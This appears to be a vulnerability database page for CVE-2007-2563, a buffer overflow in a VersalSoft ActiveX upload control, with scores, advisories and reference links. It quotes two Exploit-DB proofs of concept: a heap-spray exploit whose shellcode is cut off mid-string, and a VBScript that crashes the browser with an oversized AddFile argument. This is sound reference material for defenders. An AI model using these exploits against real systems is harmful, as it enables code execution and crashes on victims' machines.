CVE-2007-2563
published 2007-05-09CVE-2007-2563: Buffer overflow in the AddFile function in VersalSoft HTTP File Upload ActiveX control (UFileUploaderD.dll) allows remote attackers to execute arbitrary code…
PriorityP343critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
7.22%
93.5th percentile
Buffer overflow in the AddFile function in VersalSoft HTTP File Upload ActiveX control (UFileUploaderD.dll) allows remote attackers to execute arbitrary code via a long argument.
CVSS provenance
nvdv2.09.3CRITICALAV:N/AC:M/Au:N/C:C/I:C/A:C
vendor_redhat2.1LOW
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-h7pj-cwh9-5339: Buffer overflow in the AddFile function in VersalSoft HTTP File Upload ActiveX control (UFileUploaderD
ghsa_unreviewed·2022-05-01
CVE-2007-2563 [HIGH] GHSA-h7pj-cwh9-5339: Buffer overflow in the AddFile function in VersalSoft HTTP File Upload ActiveX control (UFileUploaderD
Buffer overflow in the AddFile function in VersalSoft HTTP File Upload ActiveX control (UFileUploaderD.dll) allows remote attackers to execute arbitrary code via a long argument.
Red Hat
php: curl safe mode bypass
vendor_redhat·2008-01-22·CVSS 2.1
CVE-2007-4850 [LOW] php: curl safe mode bypass
php: curl safe mode bypass
curl/interface.c in the cURL library (aka libcurl) in PHP 5.2.4 and 5.2.5 allows context-dependent attackers to bypass safe_mode and open_basedir restrictions and read arbitrary files via a file:// request containing a \x00 sequence, a different vulnerability than CVE-2006-2563.
Statement: We do not consider these to be security issues. For more details see https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=169857#c1 and https://www.php.net/security-note.php
No detection rules found.
Exploit-DB
Versalsoft HTTP File Uploader - 'AddFile()' Remote Buffer Overflow
exploitdb·2007-07-19
CVE-2007-2563 Versalsoft HTTP File Uploader - 'AddFile()' Remote Buffer Overflow
Versalsoft HTTP File Uploader - 'AddFile()' Remote Buffer Overflow
---
Versalsoft HTTP File Uploader (UFileUploaderD.dll v. 6.0.0.38) "AddFile()" method
Remote Buffer Overflow Ecploit (Heap Spray Technique)
url: http://en.versalsoft.com/
price: from $59.95 to $799.95
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
This exploits executes calc.exe
var shellcode = unescape( "%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800" +
"%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A" +
"%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350" +
"%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40" +
"%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%
Exploit-DB
Versalsoft HTTP File Uploader - ActiveX 6.36 AddFile Remote Denial of Service
exploitdb·2007-05-07
CVE-2007-2563 Versalsoft HTTP File Uploader - ActiveX 6.36 AddFile Remote Denial of Service
Versalsoft HTTP File Uploader - ActiveX 6.36 AddFile Remote Denial of Service
---
2007/05/07
Versalsoft HTTP File Uploader (UFileUploaderD.dll) 'AddFile' method Buffer Overflow
url: http://en.versalsoft.com/
price: from $59.95 to $799.95
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
Try only 1500 characters (or less) to see IE crash.
Sub tryMe
on error resume next
arg1 = String (4000,"A")
target.AddFile arg1
End Sub
Sub QuoteMe
Dim MyMsg
MyMsg = MsgBox("I'm coming down with a fever" & vbCrLf & _
"I'm really out to sea" & vbCrLf & _
"This kettle is boiling over" & vbCrLf & _
"I think I'm a banana tree", 64, "2007/05/07 - Versalsoft HTTP File Uploader")
End Sub
As y
http://moaxb.blogspot.com/2007/05/moaxb-07-versalsoft-http-file-uploader.htmlhttp://osvdb.org/34339http://secunia.com/advisories/25156http://www.securityfocus.com/bid/23853http://www.shinnai.altervista.org/moaxb/20070507/ufile.txthttp://www.vupen.com/english/advisories/2007/1672https://exchange.xforce.ibmcloud.com/vulnerabilities/34123http://moaxb.blogspot.com/2007/05/moaxb-07-versalsoft-http-file-uploader.htmlhttp://osvdb.org/34339http://secunia.com/advisories/25156http://www.securityfocus.com/bid/23853http://www.shinnai.altervista.org/moaxb/20070507/ufile.txthttp://www.vupen.com/english/advisories/2007/1672https://exchange.xforce.ibmcloud.com/vulnerabilities/34123
2007-05-09
Published